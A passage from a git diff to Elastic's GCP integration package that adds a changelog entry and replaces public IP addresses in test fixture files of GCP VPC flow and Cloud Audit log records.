k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"67.43.156.13","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.168.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"67.43.156.13","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"67.43.156.13","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"67.43.156.13","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"}
diff --git a/packages/gcp/changelog.yml b/packages/gcp/changelog.yml
index 06be6cc3698..5ecd24b356b 100644
--- a/packages/gcp/changelog.yml
+++ b/packages/gcp/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.2.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log
index 8336643ee34..a26f7c7c069 100644
--- a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log
+++ b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log
@@ -3,8 +3,8 @@ {"insertId":"yonau2dg2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"response":{"@type":"core.k8s.io/v1.Status","apiVersion":"v1","details":{"group":"batch","kind":"jobs","name":"gsuite-exporter-1589294700","uid":"2beff34a-945f-11ea-bacf-42010a80007f"},"kind":"Status","metadata":{},"status":"Success"},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} 
{"insertId":"yonau3dc2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com","status":{"code":7,"message":"PERMISSION_DENIED"}},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} {"insertId":"87efd529-6349-45d2-b905-fc607e6c5d3b","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"cert-manager-webhook:auth-delegator\" of ClusterRole \"system:auth-delegator\" to ServiceAccount 
\"cert-manager-webhook/cert-manager\""},"logName":"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"5555555-6349-45d2-b905-fc607e6c5d3b","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:serviceaccount:cert-manager:cert-manager-webhook"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","resource":"authorization.k8s.io/v1beta1/subjectaccessreviews"}],"methodName":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","request":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":false}},"requestMetadata":{"callerIp":"10.11.12.13","callerSuppliedUserAgent":"webhook/v0.0.0 (linux/amd64) kubernetes/$Format"},"resourceName":"authorization.k8s.io/v1beta1/subjectaccessreviews","response":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":true,"reason":"RBAC: allowed by ClusterRoleBinding \"system:discovery\" of ClusterRole \"system:discovery\" to Group 
\"system:authenticated\""}},"serviceName":"k8s.io","status":{"code":0}},"receiveTimestamp":"2020-08-05T21:07:32.157698684Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2020-08-05T21:07:30.974750Z"} -{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"1.2.3.4","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} -{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"2.3.4.5","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 
Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} +{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"ty